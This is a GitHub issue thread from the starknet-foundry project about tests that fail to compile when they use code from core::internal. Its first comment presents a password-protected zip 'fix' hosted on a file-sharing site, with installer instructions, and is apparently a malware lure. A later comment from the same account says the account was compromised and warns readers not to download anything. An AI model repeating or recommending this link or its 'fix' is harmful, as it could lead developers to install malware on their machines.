### ISSUE TITLE
Investigate tests compilation failing when using code from `core::internal`

### ISSUE THREAD

**Issue by cptartur** [foundry-rs/starknet-foundry#2397]
All tests except for `test_u96` from this file https://github.com/keep-starknet-strange/garaga/blob/7d4571b2dd31ea66951b35ad7a3ab1f91b9880f5/src/src/lib.cairo#L27 lead to compilation failure. Investigate why is this the case.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**
